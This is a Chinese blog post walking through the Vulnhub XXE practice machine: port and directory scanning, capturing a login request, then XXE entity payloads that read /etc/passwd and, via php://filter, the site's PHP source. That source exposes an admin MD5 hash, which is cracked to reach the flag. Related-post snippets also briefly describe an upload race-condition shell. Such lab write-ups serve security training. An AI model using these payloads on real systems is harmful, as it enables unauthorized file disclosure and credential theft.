XXE -靶机

最新推荐文章于 2024-08-27 16:29:55 发布
最新推荐文章于 2024-08-27 16:29:55 发布
阅读量539 收藏 5
点赞数 11
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75891821/article/details/140696546
版权

XXE靶机

一.扫描端口 进入xxe靶机

1.1然后进入到kali里 使用namp 扫描一下靶机开放端口等信息

1.2扫描他的目录

二 利用获取的信息

进入到 robots.txt 按他给出的信息

去访问xss 是一个登陆界面 admin.php 也是一个登陆界面

我们访问xss登陆界面 随便输 打开burpsuite抓包 发现数据以post方式提交,并在最下方有xxe代码
发送到repeater提交试试

这里注意 ad 有回显 那么如果将ad 指向其他文件 有可能就有xxe漏洞

三.漏洞利用

我们构造xxe语句 访问 etc/passwd/看看是否有回显

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///etc/passwd">
]>

可以看到显示文件 那么继续查看文件 apache首页文件默认路径/var/www/html

发现读取不了

<!DOCTYPE test[
<!ENTITY ad SYSTEM "file:///var/www/html/xxe/index.php">
]>

我们可以用php伪文件协议读取

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/index.php">
]>

再通过base64 解密 可以看到里面的内容并没有我们想要的 没有可以利用的

但是还有一个文件 /xxe/admin/ 我们没有查看

我们可以用同样的方式查看

<!DOCTYPE test[
<!ENTITY ad SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/xxe/admin.php">
]>

base64解密后得到关键信息

可以看到用户名跟md5加密后的密码

md5加密后的密码解密得出用户密码

登入 发现里面没有我们想要的flag

看看是否在xxe文档下

查看页面源代码 得到flag

苏北辰-
关注
  • 11
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透:vulnhub-XXE 靶机
m0_46412682的博客
09-13 1200
渗透:vulnhub-XXE 靶机 一、靶机下载 靶机XXE 下载地址: https://download.vulnhub.com/xxe/XXE.zip 二、装靶机 ①把下载好的压缩包解压到我自己的D盘:F:\虚拟机数据\XXE ②右键双击xxe.ovf-->打开方式-->VMware,存储在自己喜欢的位置 导入后,打开虚拟机 就这样,然后设置nat模式 我们这里的VM...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE靶场中,我们可以模拟实际场景进行练习,例如在vulnhub的XXE Lab:1靶场中,首先识别靶机IP,使用工具如nmap扫描开放端口,然后通过目录遍历(如`robots.txt`)和Burp Suite抓包分析,确定XML数据传输。...
XML schema 编辑工具 xxe-perso-4_9_1
11-19
XML schema 编辑工具 xxe-perso-4_9_1
vulnhub-XXE靶机渗透
banacyo14206的博客
08-24 389
靶机: 下载链接:https://download.vulnhub.com/xxe/XXE.zip XXE注入工具下载: https://download.csdn.net/download/weixin_41082546/11609927 CTFCrackTools解码工具: https://download.csdn.net/download/weixin_410825...
vulnhub-XXE漏洞靶机流程(图文+工具包)
qq_45514735的博客
03-05 5895
靶机下载链接 http://download.vulnhub.com/xxe/XXE.zip win下全套工具包 链接:https://pan.baidu.com/s/1joOWbE6823GuFyBm92sR0A 提取码:r0xn 一、首先打开靶机 靶机是不给你账号密码的,为了防止你直接混入系统查找flag,通常密码都会先设置的非常复杂,不要想着破解了。 二、打开nmap对内网进行一次扫描找到靶机 在虚拟机里找到你的内网ip池以及掩码 填入nmap,配置选择Qui......
vulnhub之XXE靶机详解
天天学安全专属博客
03-20 814
vulnhub之XXE靶机详解
vulhub靶场学习日记xxe-lab
m0_55763479的博客
07-27 1117
vulhub靶场学习日记xxe-lab,主要练习XEE漏洞!
VULNHUB-XXE漏洞 靶机
starhei.zxy的博客
07-25 521
构造xml 在之前的爬虫文件中有一个admin.php的管理员登陆界面,读取一下他。有个/xxe/应该是个路径 打开看看 admin.php是个文件。虚拟机虚拟网络编辑器是net 可以知道虚拟机的ip池。然后还需要base32解密--》 base64解密。这里知道有漏洞 那如何利用 试试admin.php。有个flag 点了一下跳转没了 看看网页源代码。扫描一下目录发现有个robots.txt。1.导入打开虚拟机 然后没账号密码~这个是用base64获取的源码 去解码。这个密码也是md5加密过的。
Vulnhub-xxe靶机通关,获取最终flag
test\\的博客
03-23 1424
1、 信息收集,nmap探测靶机地址 得到目标地址192.168.248.168,只开放80端口 2、 使用御剑对目标网站后台扫描 3、 发现存在信息页面 4、 访问/xxe路径 5、 传参抓包,得知通过xml传参 6、 构造恶意xml,替换参数 <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE r [ <!ELE...
Vulnhub-XXE靶机
djpcs2013的博客
06-10 459
1.主机发现 nmap -sS 192.168.74.1/24 就是192.168.74.158没错了,开放了80端口。 2.前期信息收集 访问192.168.74.158,就是apache默认页。 御剑扫目录。 访问robots.txt。存在/xxe/路径,admin.php。 ip/xxe为登录界面。 admin.php在/xxe/目录下。ip/xxe...
一道关于php文件包含的CTF题
最新发布
m0_62903168的博客
08-27 1652
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1541
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 1006
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 1040
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
Android中apk安装过程源码解析
k663514387的博客
08-25 1464
android apk安装流程源码解析
Android调整进程的oom_adj
zoujin6649的博客
08-22 680
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值